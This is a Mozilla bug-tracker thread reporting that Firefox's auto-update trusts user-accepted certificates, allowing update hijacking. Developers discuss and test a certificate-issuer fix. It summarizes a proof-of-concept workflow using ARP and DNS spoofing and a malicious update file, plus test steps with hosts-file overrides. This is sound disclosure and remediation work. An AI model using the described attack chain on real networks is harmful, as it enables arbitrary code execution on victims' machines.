User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:22.214.171.124) Gecko/20060426 Firefox/126.96.36.199
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:188.8.131.52) Gecko/20060426 Firefox/184.108.40.206
The software update system in Firefox is assumed to be secure as an invalid certificate or non-matching CN causes the SSL connection to the update server to be reset and Firefox displays an error.
However, there is an oversight that exposes a security problem...the browser trusts its own certificate cache. Therefore, if an attacker can get his certificate accepted by a victim, the attacker gains free reign to hijack the software update session and potentially execute arbitrary code on the victim's host.
- Victim goes to their favorite SSL-enabled website
- Attacker spoofs DNS to redirect them to their lookalike site
- Victim accepts attacker's certificate (either permanently OR temporarily) because they don't know any better or simply don't care if someone's snooping on
- Firefox software update is triggered, either manually through "Help->Check For Updates" or automatically the next time Firefox is started.
- Attacker spoofs DNS for aus2.mozilla.org and SSL connection is successful due to the victim's earlier acceptance of the attacker's cert.
- Firefox follows the evil XML file and Take-Over-The-World v1.0 code is downloaded to victim's host.
Usually, in the worst case, accepting a invalid SSL certificate only results in MITM snooping, but in this case the flaw in Firefox exposes the victim to local code execution. A potential solution would be to not rely on the certificates that a user has accepted when making the SSL connection to the update server.
Once a user has accepted a cert I don't know that the client can get the information to know whether it's a user-accepted cert or built in. PSM probably can, maybe it could expose something.
Aren't such certs accepted for a particular site? If so the attacker's look-alike-site (to something else) has to be using aus2.mozilla.org as its hostname for this to work.
I believe we're moving toward eliminating the dialogs and making invalid certs simply fail -- no option to accept them. That would stop this attack.
Storing a copy of the "one true cert" in the client and comparing against that (or it's hash or fingerprint) would also work, at least until the cert expired. Would make it that much more difficult for corporate sites to customize the update URL to an internal site.
> Aren't such certs accepted for a particular site?
The cert for the lookalike site would simply have to set the CN to aus2.mozilla.org. Firefox displays a warning when the CN of a cert doesn't match the hostname of the site.
> Would make it that much more difficult for corporate sites to customize the
> update URL to an internal site.
Perhaps a good solution would be to store a hash of the update server's cert in something like "app.update.cert_hash". By default, it would be the hash of aus2.mozilla.org's cert but could be easily modified by corporate users using a custom update server.
but the certificate will expire at some point. update would stop malfunctioning then if the client expected a specific cert...
(In reply to comment #4)
> but the certificate will expire at some point. update would stop malfunctioning
> then if the client expected a specific cert...
Ah, true. Has anyone entertained the idea of signing the updates themselves?
We did consider signing the updates (and there were lengthy discussions on the matter), but we opted for the current solution because it seemed simpler.
Created attachment 224375 [details]
proof of concept
I whipped up this proof on concept just to show how easily this vulnerability can be exploited in a live network environment.
It operates as follows:
* Starts up SSL webserver with a self-signed certificate
(CN = aus2.mozilla.org)
* Turns on IPv4 forwarding and runs arpspoof to poison the arp cache
of hosts on the local network
* Runs dnsspoof to redirect requests to RANDOM_SSL_SITE and
aus2.mozilla.org to our webserver
* Waits patiently...
* Modify simple vars at top of firefox-poc.py...I'm lazy ;-)
* Start up PoC (python firefox-poc.py)
* Start up Firefox (note: Firefox must have write privledges to the
directory containing its binary in order for the update system to
be enabled, may require root)
* Visit https://RANDOM_SSL_SITE and accept the bad cert
* Go to "Help->Check For Updates" and update and restart Firefox
* Since our evil cert was accepted when the user visited
RANDOM_SSL_SITE, the connection to aus2.mozilla.org can be
hijacked and our malicious payload evil.mar is delivered and
* evil.mar is harmless and simply places a Hello World bash script
in Firefox's directory as proof of concept
* Python - http://www.python.org/
* TLS Lite - http://trevp.net/tlslite/
Provides SSL for python webserver
* dsniff - http://www.monkey.org/~dugsong/dsniff/
Provides arpspoof and dnsspoof
how about having the update code verify that the cert was signed by a known CA? this wouldn't have the issue of making customized update sites harder.
I guess the attacker could get the user to install his CA certificate, but I suppose there's no real defense against that...
Ping! Over a month and no progress on an easily exploitable bug...
We've not forgotten this (note the "blocking firefox 2" approval flag that was just granted).
The cert system was unfotunately not designed with naive users in mind. Really about the only thing to do is not present the dialog at all on a questionable cert. Can't validate? Can't Connect!
This will, of course, piss off lots of developer-types who run sites with self-signed certs, who also tend to be our biggest fans... kind of a dilemma. IE7 might be going that route, if so we could get away with it.
We could have a pref to control whether or not the dialogs are shown, and we could default that pref to false. That's pretty suboptimal but it would allow developer-types to get around the restriction. If we do this, we'd need to be sure to give the user sufficient feedback as to why the load could not proceed.
(In reply to comment #10)
> This will, of course, **** off lots of developer-types who run sites with
> self-signed certs, who also tend to be our biggest fans... kind of a dilemma.
> IE7 might be going that route, if so we could get away with it.
I can't imagine any browser would do such a thing...that's pretty ridiculous.
The issue here is not the cert system, it's that the update system trusts the cert system when it connects to the update server. Accepting an invalid certificate and putting yourself at risk for MITM SSL snooping is nothing new, but the issue here is the local code execution that results.
Is there any reason why Christian's suggestion in comment #8 would be infeasible?
christian's solution sounds promising to me.
Mozilla's policy is that the *USER* is in complete control of his set of
trusted CA certificates, and the USER is responsible for it, not mozilla.
It's not our decision to make for the user, it's the user's decision to
make for himself. We provide a default list for the user to use as a
starting point, but the user is in complete control after that.
MoFo/MoCo avoid a certain degree of liability that they might otherwise
incur if they did exert complete control over it.
This bug report proposes another policy, one in which mozilla, not the
user, decides what is (and is not) an trustworthy CA certificate (and
indirectly, what is and isn't a trustworthy SSL server cert), at least
for updates. Such a policy change should be made only after full
consideration of all its implications.
It doesn't look to me that's what this is about. This is about the user explicitly accepting a semi-invalid certificate for https://www.phisher.com/ and then the update service being phished at https://update.mozilla.org/
Accepting the "bad" certificate for phisher.com shouldn't have any affect on certificate resolution for update.mozilla.org (or any other site, for that matter).
I *think* the scenario being described here is equivalent to this shorter and
1. create an https server whose real DNS name is https://phisher.com
2. Give it a self-issued cert that claims to be for https://aus2.mozilla.org
3. Get the victim to visit https://phisher.com.
4. Get the victim to override the error about cert being from unknown issuer
5. Get the victim to override the error about cert/host name mismatch
6. poison victim's DNS cache (just alter etc/hosts) so that aus2.mozilla.org
points to the IP address for phisher.com
7. Victim fetches update from https://phisher.com, but really is fetching
from https server at phisher.com. No host name mismatch error, because
names match. No error about invalid cert issuer, because USER has already
explicitly chosen to trust the cert supplied by phisher.com.
The user made a security decision at step 4 to trust the cert at FACE VALUE
despite it being from an unknown issuer. That means that we will trust the
cert in all respects AS IF IT HAD COME FROM A TRUSTED ISSUER, including
trusting that the host names on its face were correct. That was the user's
decision, his choice. We can take that choice away from him. Do you propose that?
The user made an additional decision (step 5) to ADDITIONALLY trust the cert
for a name that is NOT ON ITS FACE, namely phisher.com. We add that name to
the list of trusted names for that cert, just as if that name had been in
Now, apparently, you want to have the result of steps 4 and 5 be that we
do NOT trust the cert for the values on its face, but do trust it for the
names we added to it. Do I have that right?
This is almost certainly a duplicate of one of several other older bugs,
most of which were resolved invalid. I just want to be sure I understand
what precisely you're proposing so I know which bug (if any) is the dup.
The point is that when the user chooses to override a cert security dialog,
he is choosing to treat a cert as if it was completely valid on its face,
as if it was issued by a properly trusted CA. That's what it does.
That's the decision the user makes. I think you're asking for behavior
that is inconsistent with that user decision.
Above my step 7 was intended to read:
7. Victim fetches update from https://aus2.mozilla.org, but really is fetching
from https server at phisher.com. (rest is the same)
I think this bug is essentially a duplicate of bug 308244 which is unresolved.
In reviewing that bug, and this one again, several things are clear to me:
a) people have a mental model of how cert validation works that doesn't
match up with how it really works, so when they discover that it doesn't
work as they had imagined, they perceive it to be a vulnerability.
b) people aren't generally aware that when they override an error that says
"this cert isn't provably from a trusted source", they're saying "oh, yes
it is; treat it as such."
c) people apparently expect that when they experience and override a cert
name mismatch, that thereafter the newly trusted cert is NOT trusted for
any of the host names on its face, and is (only) trusted for the
hostname they were seeking at the time they chose to perform the override.
Actually, in retrospect, I think maybe it's not a bad idea to change the
behavior to work as suggested in "c" above. We could change the behavior
of cert name matching so that, when the cert has a non-empty set of additional
host names that have been attached to it via name mismatch overrides, then
we ONLY check for matches between the current URL hostname and the names in
set of additional hostnames, and NOT for any of the names that exist in the
One consequence of that proposal would be that if the user went to the site
named in a cert, after he had used that same cert with some other host and
had performed a name override, he'd have to perform ANOTHER override to get
the cert to work with the name that is already in the cert! I can just
IMAGING trying to explain THAT to users. ("But the name is already in the
There's also a potential for a DoS attack if we do that. The admin of site
https://phisher.com puts a copy of the real cert from aus2.mozilla.org on
his server, and gets people to visit his site as https://phisher.com.
The victims override the cert name mismatch, thereby rendering that cert
unusable for the real aus2.mozilla.org site, and thereby preventing any
subsequent successful accesses of the real https://aus2.mozilla.org (unless
the user does ANOTHER name mismatch override).
Personally, much as I know many people would find it inconvenient, I think
the only realy solution to the vulnerabilities is to eliminate the users'
capability of overriding cert/host name mismatches. Our desire to allow
some people ("advanced (?) users") to do this in limited circumstances
creates an essentially inescapable vulnerability for basic users who
override cert errors willy-nilly, every chance they get. I think that as
long as we let people override security errors, they will hurt themselves
by so doing.
(In reply to comment #15)
> Accepting the "bad" certificate for phisher.com shouldn't have any affect on
> certificate resolution for update.mozilla.org (or any other site, for that
Nelson: Your scenario described in comment #7 is mostly correct, although you can spoof DNS on a local network to achieve steps 3 and 6 much easier. This is exactly what the proof of concept does.
I believe you may be confused about the scope of this bug though. Most users have accepted invalid certificates at some point usually because of ignorance of its consequences. I have accepted invalid certificates many times for various reasons and I am a network security engineer and an aware of the consequences. But here's the thing, and this is a synopsis of the entire bug:
Accepting an invalid certificate for an arbitrary site should only expose a user to SSL MITM attacks. It should NEVER allow local code execution, as the update system facilitates in this case. The division between host and network security is breached, therefore the update system has a bug.
An attacker could use a library/coffee shop/university/corporate/any available network and within minutes be executing arbitrary code on victim hosts via the Firefox update system. If you believe that does not qualify as a bug, feel free to mark it as invalid, but I would expect a fair backlash from the security community when this is publically disclosed.
Nelson, you miss the point of this bug, the original problem is nothing like bug 308244 or any change to cert handling in the normal case (apart from my suggestion in comment 10, echoed in the last paragraph of your comment 18, that we simply reject mismatched certs which sidesteps the whole update issue, and comment 15 which restates bug 308244).
(In reply to comment #16)
> Now, apparently, you want to have the result of steps 4 and 5 be that we
> do NOT trust the cert for the values on its face, but do trust it for the
> names we added to it. Do I have that right?
No: the reporter wants us not to trust such a cert under any circumstances for any name __in the context of Firefox updates__. Updates are the only concern here. The reporter would be happy if the update code embedded the One True Cert and rejected connections under any other cert. Biesi's suggested compromise was to check that the CA for the connection was at least an installed one. There are probably few other options because NSS doesn't expose the fact that this is a temporarily user-accepted cert (afaik).
> The point is that when the user chooses to override a cert security dialog,
> he is choosing to treat a cert as if it was completely valid on its face,
> as if it was issued by a properly trusted CA. That's what it does.
> That's the decision the user makes. I think you're asking for behavior
> that is inconsistent with that user decision.
But the user, being naive, thinks they're saying "thanks for warning me this may be a dodgy site, but I'd like to connect anyway. I'll be careful." They have no concept that this temporary choice would have any bearing on the security of any non-browsing feature (or, for that matter, that it applies to browsing any other site--but that is bug 308244 as you point out). In particular they have no clue that we rely on the integrity of these certs to secure the update feature.
> Accepting an invalid certificate for an arbitrary site should only expose a
> user to SSL MITM attacks. It should NEVER allow local code execution, as
> the update system facilitates in this case.
Apparently the update system says "if the cert is good enough for SSL, it's
good enough for me too, and I will allow local code execution based on it."
That's a flawed design of the update system.
"Good enough for SSL" means the cert was directly trusted by the local user,
or was issued by someone who the local user trusts to be truthful. You
apparently don't want the trust decision for the update system to include
the local user's trust choices. Therefore, you don't want the update
system's trust to be determined by the algorithms that determine "good
enough for SSL".
There is already a separate trust system for code signing. when the user
chooses to trust a cert for SSL, that does NOT also trust the cert for code
signing. Maybe you want to be using code signing trust, rather than SSL
server trust, for the update system.
> Accepting the "bad" certificate for phisher.com shouldn't have any affect
> on certificate resolution for update.mozilla.org (or any other site, for
> that matter).
Accepting a "bad" certificate means choosing to believe that the cert's
contents (names, keys, etc.) are correct (a.k.a "valid", or "true") even
though we can't prove they came from a trusted issuer. This is also called
"trusting" the cert. It means the local user chooses to believe it as it is,
chooses to take it at face value for everything it says. If it says it's
for update.mozilla.org, then WILL have an affect on future resolution of
certs for that site. The user tells us to do it, and we do it.
As long as you continue to trust the names in the cert itself, then allowing
the user to "accept" any cert (as we now do) will always make the user
vulnerable to spoofing on whatever DNS names appear in that accepted cert.
As I wrote in comment 18, one way to do what Ben wants is to do all the
following when a user "accepts" a cert:
a) add this cert to the list of user-trusted certs, and
b) mark it as NOT being trusted for any of the host DNS names that appear
in the cert itself, and
c) attach to the cert a list of DNS names for which the user has chosen to
trust the cert (the URI's host name when the user "accepted" the cert), and
d) thereafter trust the cert ONLY for the names in that attached list of
names and NOT for the names in the cert itself.
> Maybe you want to be using code signing trust, rather than SSL server trust,
(or in addition to it)
> for the update system.
Note: that doesn't necessarily mean using code signing (e.g. signed JAR files).
Having determined that the SSL server cert is "good enough for SSL", you could
then subject it to an additional test that it is also "good enough for code
(In reply to comment #22)
> Having determined that the SSL server cert is "good enough for SSL", you could
> then subject it to an additional test that it is also "good enough for code
I'm not sure what you mean by this. Are you referring simply to checking that the root CA issuing the SSL cert has the code signing trust bit turned on as well, or are you referring to a specific check on the SSL cert itself? The former seems a weak test; there are a number of CAs with the code signing trust bit on.
NSS's CERT_VerifyCertificate API takes a pointer to a leaf cert (e.g. server
cert) and a "usage type" (e.g. SSL server usage, SSL client usage, email
signing usage, code signing usage, etc.). It then reconstructs the cert
chain for that cert (as much as it can) and walks the chain, validating
signatures and all the other stuff, until it comes to one of these conclusions:
a) this cert is verifiably good for the requested usage, because its chain
includes an issuer that is trusted to issue certs of this usage, and no
intermediate CA cert in the chain contains any qualifiers that prevent this
b) this cert is verifiably NOT good for the requested usage because one of
more of thte issuer certs in the chain is qualified (with extensions) that prevent it from issuing certs of the requested usage, or
c) this cert is not verifiably good or bad for this purpose, because no
cert in the chain is trusted to issue certs for this usage.
This is the function that is used to ask "is this cert good enough for SSL",
and it can also be asked to check if the cert is good enough for code signing.
I'm suggesting that in the update server case, the client can check the cert
for multiple usages, one of which is code signing. The server cert would then have to be both an SSL server cert and a code signing cert.
This is just an idea, and may not be the best conceivable one. It is generally recommended that code signing certs be used as "off line" certs, meaning that their private keys are not kept on machines that are on the net, especially not on servers. I'd really like it if we could use real code signing. But there seems to be a great reluctance with MoFo or MoCo to do that, for reasons that have never been explained to me.
(In reply to comment #24)
> I'm suggesting that in the update server case, the client can check the cert
> for multiple usages, one of which is code signing. The server cert would then
> have to be both an SSL server cert and a code signing cert.
OK, I get it now. The end-entity certificate would have to be issued with both usage types, which is not something you could get in a plain vanilla SSL cert.
> I'd really like it if we could use real code signing. But there
> seems to be a great reluctance with MoFo or MoCo to do that, for reasons that
> have never been explained to me.
I'd like to revisit that discussion; can you or someone else point me to the relevant mailing list or newsgroup threafs? I did a quick search of the Google newsgroup archives and my copy of the internal mailing list and couldn't find exactly the thread(s) I remember.
It may be that the issues raised then are still issues, or maybe not. I will say that I don't think that money per se is or should be the issue. There are lots of ways we could deal with the money problem.
HTTPS was used because it was seen as a simple solution to the problem at hand. We fetch a manifest "securely," and that manifest contains a crypto hash of the archive that is downloaded over plaintext. Since there is near zero-cost for mozilla sysadmins to manage another SSL-site and the amount of build engineering required was lessened by not having to digitally sign the archives, this was seen as an attractive solution.
We were concerned about the cert problem, which is why we implemented code to always answer "no" to the bad cert dialog when loading the manifest. Unfortunately, it has this bug, and no one realized this flaw at the time.
I have learned that there is an extension for FF that detects the cert/host
name mismatch dialog and automatically bonks the OK button. It should be
called the "MITM vulnerability" extension.
In bug 228684, several people (including mscott, as I read it) propose that
that extension should be a feature of FF.
How do we reconcile the desire of one group (the particpants in this bug)
who want security that the user cannot destroy with an override, with the
desire of the group that just wants no security dialogs, no matter
the security consequences?
(In reply to comment #27)
> How do we reconcile the desire of one group (the particpants in this bug)
> who want security that the user cannot destroy with an override, with the
> desire of the group that just wants no security dialogs, no matter
> the security consequences?
Wrong. Nobody discussing this bug is talking about doing what you mention above except for you. Please reread comment #19 from me, comment #20 from Daniel, and comment #26 from Darin. I can't seem to stress enough that this bug is not about SSL certificate policy, so let's keep on-topic.
Nelson, I think NSS and PSM should provide an API to require that only valid certs be used for a particular SSL session. Is that possible?
Darin, Many of the oldest CA certs now in use in the world of PKI do not
meet the modern definition of "valid". NSS "grandfathers in" these old certs,
by providing a way to to mark a cert as valid, even if it appears invalid.
These old certs are marked this way. They depend on these overrides.
Today, when a user marks a cert as valid, he is setting the same validity
override that NSS itself uses for those old CA certs. If you say "we want
the ability to ignore/disallow the validity override", then you disable both
bad server certs (which you want to do) and old CA certs (which I'll bet you
> If you say "we want the ability to ignore/disallow the validity override",
> then you disable both bad server certs (which you want to do) and old CA
> certs (which I'll bet you don't).
Note Darin said "for a particular SSL session". That restriction would be just peachy, all we'd have to do is make sure the Update server has a cert issued by a valid CA.
That's not too high a hurdle for the handful of companies who might override the update URL with an internal IT-controlled server for corporate roll-outs. Is there any way to get a list of which CA's have grandfathered invalid certs?
Nelson, Yes I would be happy with such an API. As dveditz said, there are applications such as auto-update that do not care about grandfathered bad certs. So, what will it take for you guys to provide such an API?
Darin, we must flesh out the proposal a little more before we can estimate
the time requires.
NSS offers two sets of functions today for cert chain validation. They differ
only in how the caller specifies the "usage" (e.g. SSL server cert, SSL client
cert, S/MIME encryption cert, S/MIME signature cert) for which he wants the
cert chain to be validated.
We might add a new usage to the list of known supported usages (e.g. SSL server ignoring valid/trusted peer overrides). Or we might add a new function (e.g.
Then presumably either an existing call to one of the CERT_VerifyCert* calls
would have to be changed, or a new call added. Personally, I'd think it
would be best to leave the SSL cert handling code in PSM alone, and add a new
call in the update processing code somewhere, to do an additional check on
the cert chain after it has passed the normal SSL cert chain verification.
But one could imagine something less clean, in which the PSM code tht does
testing of SSL server certs (using NSS functions) would be changed to know
about special URLs.
Which of those do you have in mind, if either. ? (and what do you have in
mind, if none of the above?)
There's a very large project now underway (for over a year now) to produce an
entirely new cert chain validation implementation that fully implements all
of RFC 3280's algorithm, including dynamic cert fetching for incomplete server
cert chains. I need to consult with Julien Pierre, the leader of that project. We would want to design any new API in such a way that it doesn't set that project back significantly (after 24+ man months of work).
Nelson, I'd be happy with either the ability to tell PSM up-front that I don't want to use invalid certs or with the ability to test the cert later on for validity.
Mozilla has access to the nsNSSIOLayer object defined by PSM. If you can define an interface that that guy can implement, then we would be able to use it from the software update code to resolve this bug.
CCing other consumers of nsIBadCertListener, so they can be aware of this problem.
Nelson/Darin: what type of traction do we have here? Is it reasonable to expect something in the next 2-3 weeks?
(I hope this is obvious, but better safe... :-) The extension manager also has this same vulnerability, when checking for extension updates. One could use this technique to fake the availability of an update, and then serve up the fake update with arbitrary code.
More bug fodder: A quick check for "url" in about:config shows that some other browser features look vulnerable (at lesser degrees of severity) to this certificate handling quirk. For example, spoofing the Plugin Finder Service or "Get More Extensions" button could lead to users installing arbitrary code from a seemingly-trusted site. However, this admittedly gets into the fuzzy rathole between this bug, the issues in comment 18, and allowing users to ignore these warning in the first place. [For example, we could make clicking on "Get More Extensions" spoof-proof via this bug, but how do you explain that clicking the same link in a web page (or even just typing it in) isn't always safe? Ugh!]
To me, it seems clear that we need to revamp our whole cert error override
scheme, and not just put a band-aid on update downloads for a particular
site or domain (e.g. mozilla.org).
There has been a LOT of discussion among the NSS/PSM team about this,
and some definite proposals are shaping up.
One interesting observation is that most of the bugs that complain about
necessity & frequency of cert overrides are THUNDERBIRD bugs, not FireFox
bugs. The most frequent complaints concern bad certs for servers, whose
host names are configured in preferences, not found in email or web page
links, and hence not subject to phishing attacks. (Phishers don't send
emails telling their victims to reconfigure their mail servers! :)
This leads to the possibility of taking two quite different approaches to
cert overrides, one for problems with mail/news/ldap server certs, and
another different approach for general web browser URLs. Stay tuned.
(BTW, is this a FireFox only bug? Doesn't TB also do updates?)
This applies to Thunderbird also, but the "Software Update" bugzilla component happens to currently live in the Firefox product rather than in the Toolkit product where it arguably belongs. I think there's a bug on moving it, at least it has been discussed.
Thunderbird users would seem to have less risk since they don't generally tend to come across self-signed SSL certs. Guess it could happen if you press the "show images" button on a malicious mail, or if you subscribe to a blog feed and choose to display the linked articles instead of just the summary in the feed.
Actually, it seems that numerous mail server providers tend to deploy invalid
SSL servers on the mail servers. In such cases, the users of those servers
encounter the same expired, unverifiable, and/or wrong host name certs, over
and over and over. Arguably, that is the case where having the ability to
remember a particular cert, or thumbnail of a particular cert, for the
specific server, is going to provide the highest benefit to the user (on the
grounds that the user visits the same mail servers over and over), with the
least risk from phishing. But this is the subject of bug 221552 and bug 228684.
OK, given that we'd like to have something workable for FF2, I'm considering the following solution:
Revise the update code to walk the issuer chain until we find the root issuer. Then check that the issuer has a tokenName of "Builtin Object Token" and a subjectName (or commonName?) that matches a value stored in prefs.
This is pretty easy to code, and I think it should be sufficient to protect Firefox and Thunderbird auto-update. It is not a great solution in general since some people might use a token other than the "Builtin Object Token", and mozilla.com might wish to change the cert issuer that they use in the future. Otherwise, it should do the trick.
Nelson, etc.: Please let me know what you think of this approach. Thanks!
Perhaps it is unnecessary to restrict the subject or common name of the issuer. Perhaps it is enough to just mandate an issuer from the "Builtin Object Token"
Darin, you propose to add special case code for mozilla.org, to enforce
different rules for that domain than for any other domain. Your proposal
will do what you mean it to do, to make accesses to mozilla.org less
vulnerable to user cert overrides. Ensuring a known root should suffice.
By making this proposal, and certainly by implementing it, you're stating
that allowing users to override cert errors makes the PKI security system
too weak, at least for purposes that involve mozilla.org. You're stating
that cert overrides must not be allowed for mozilla.org.
If cert overrides make https too weak for mozilla.org, then IMO they also
make it too weak for (say) BankOfAmerica.com or WellsFargo.com. FF users
should be no less secure at their bank's web site than at a mozilla.org site.
Why would it be OK for the user to be more vulnerable at his bank than at
If we're going to disallow overrides for mozilla.org then we should also
disallow overrides for bankofamerica.com and wellsfargo.com (and all others).
Please look at the proposal (and mockups) in bug 327181, and consider
that as an alternative to the proposal of comment 41 and comment 42 above.
When I wrote comment 38, I had recently attended a meeting with Red Hat
PSM and NSS folks, who were proposing a two-part solution: one solution
for the FireFox and SeaMonkey browsers (as proposed/shown in bug 327181),
and a second proposal for Thunderbird and SeaMonkey mail/news clients
(which AFAIK has not yet been set forth in any bugzilla RFE).
I thought that both of these proposals were going to be carried forward to
mozilla.org shortly after that meeting. Unfortunately, I've seen no further expression of interest in these proposals from the participants since that
meeting. So, if you urgently need to enact a short-term solution, no
alternatives to your proposals seem immediately available.
Thank you for taking the time to verify my proposed solution. Much appreciated!
> FF users should be no less secure at their bank's web site than at a
> mozilla.org site. Why would it be OK for the user to be more vulnerable at
> his bank than at mozilla.org?
I agree. I should point out that my proposal does not impact the behavior of FF when the user navigates to mozilla.org. Instead, it only impacts the software update system, which is invoked automatically w/o user interaction.
OK, I will proceed with the plan of creating a patch to implement issuer checking as proposed.
Moving target milestone from b2. We'd still like to get this in for release so it would be great to get this patched up and landed for branch.
Created attachment 234362 [details] [diff] [review]
Comment on attachment 234362 [details] [diff] [review]
+ if (!channel.originalURI.schemeIs("https")) // bypass
hm... what if http redirected to https? guess then you don't have much security anyway...
but why not just nullcheck securityInfo?
+ // Perform some rudementary certificate verification:
(In reply to comment #47)
> (From update of attachment 234362 [details] [diff] [review] )
> + if (!channel.originalURI.schemeIs("https")) // bypass
> hm... what if http redirected to https? guess then you don't have much security
Right. If the original URL specified is not HTTPS, then there's no point in doing any further checks.
> but why not just nullcheck securityInfo?
Because the bad guy could have redirected from HTTPS to HTTP!
> + // Perform some rudementary certificate verification:
Yeah, that's the word I intended, but I actually don't like that comment being in there. It's not really accurate, and it doesn't add anything. I'll take it out.
Created attachment 234367 [details] [diff] [review]
Comment on attachment 234367 [details] [diff] [review]
so, if the throwing upon accessing properties of a null securityInfo is an important part of the security check here, then there should probably be a comment to that effect :)
while I'm nitpicking, this log statement now no longer lists all the possible causes:
LOG("Checker", "There was a problem with the update service URL specified, " +
"either the XML file was malformed or it does not exist at the location " +
"specified. Exception: " + e);
> so, if the throwing upon accessing properties of a null securityInfo is an
> important part of the security check here, then there should probably be a
> comment to that effect :)
Yeah, I wanted to go into detail about this security check, but I'm not sure if I should give away so much detail about this flaw until long after people have been updated ;-)
> while I'm nitpicking, this log statement now no longer lists all the possible
> LOG("Checker", "There was a problem with the update service URL
> specified, " +
> "either the XML file was malformed or it does not exist at the
> location " +
> "specified. Exception: " + e);
Yeah, that's true. At least it does record the exception text.
Oh, actually - isn't there an issue even if the attacker redirects HTTPS (bad cert) -> HTTPS (good cert, but his server)? That is... should you maybe observe onChannelRedirect and do the check there?
Hmm... I think you are correct.
Created attachment 234494 [details] [diff] [review]
Revised to include cert check of previous channel when redirecting.
Comment on attachment 234494 [details] [diff] [review]
hm, you aren't adding nsIChannelEventSink to QueryInterface? Won't that trigger assertions in C++ code?
Created attachment 234730 [details] [diff] [review]
Yeah, good catch!
Comment on attachment 234730 [details] [diff] [review]
Seems like this approach would be safe enough to land on the 1.8.0 branch as well, nominating.
Since this hasn't even landed on trunk doesn't look like it will make the 220.127.116.11 code freeze today(-ish). Feel free to surprise us with an approval request, though.
Try for 18.104.22.168 after all
Comment on attachment 234730 [details] [diff] [review]
approved for 1.8.0 branch, a=dveditz for drivers
Please be sure to test update from a build that includes this change to a later build. I believe it works properly, but I haven't tested the 1.8.0.x branch as much as the trunk.
Comment on attachment 234730 [details] [diff] [review]
We want this for FF2.
To be safe for the 1.8 branch we'll hold on this until we go through 2 update cycles which is Sun 8/27.
Comment on attachment 234730 [details] [diff] [review]
a=schrep approving all previously triaged patches which were baking on trunk.
Testing notes: you don't have to set up the whole dns-spoofing "proof of concept" attachment to verify this fix since we can assume the user (tester) will cooperate in hacking themselves.
1) Set up a secure webserver with the cert from the PoC. For the rest of this I'll assume https://localhost/, if it's elsewhere replace localhost with the actual host you're using.
2) Create https://localhost/update.xml that will trigger an update. Easiest way is to take an existing update.xml and bump the version to 22.214.171.124. Shouldn't need to change anything else, though maybe you want to munge the hashes or the download links so you don't accidentally "upgrade" your test build. The test should be complete before anything is downloaded though.
Current builds are calling themselves "126.96.36.199pre" instead of 188.8.131.52, I sure hope that doesn't screw up the update logic -- another downside to not having nightly updates working is we don't know :-(
You can find a working update.xml to use as a template at
3) alter your hosts file to equate aus2.mozilla.org with your webserver's IP address. This simulates the DNS spoofing part. (Remember to undo this afterwards).
4) Change the app.update.url pref to "https://aus2.mozilla.org/update.xml", or if you used a different path in step 2 make the path match. (Remember to reset this pref when you're done, too.)
5) In a *VULNERABLE* version, go to https://localhost/ and accept the bogus cert (for the session only, so we can restart and retest). Please use a "184.108.40.206pre" nightly prior to the fix so we can verify the "pre" bit doesn't break the updates and invalidate the test, --or-- test using a 220.127.116.11 and then use the "18.104.22.168" candidate (no 'pre') that rhelmer is building right now.
6) in the *VULNERABLE* version do "Help | Check for Updates". If you get a "updates are available" dialog you can proceed, if you do not then the setup is incorrect somewhere.
7) If things are set up correctly then quit and start the fixed version. Visit https://localhost/ and accept the bogus cert for the session as in step 5), then "Check for Updates" as in step 6). You should be told updates are not available. This is meaningful only if step 6) in the vulnerable version previously demonstrated that the setup is correct.
8) cleanup: reset your app.update.url pref and comment out or delete the aus2 entry in your hosts file. Shutdown the webserver and uninstall the bogus cert.
Using the testing scenario described in comment #67 (after first confirming that I had the environment set up correctly using a 22.214.171.124 Firefox) I found that in both 126.96.36.199 and 1.8.1 my bogus update.xml file was pulled from my server but not used. But, the message raised when I checked for updates was not "No updates found" but "AUS: Update XML file not found (404)". Is this the error message that we want raised in this situation?
Is bug 401292 a regression from this bug?
(In reply to comment #70)
> Is bug 401292 a regression from this bug?
No. It's not a regression in FF, and it's not caused by the fix for this bug.
Further comments in bug 401292.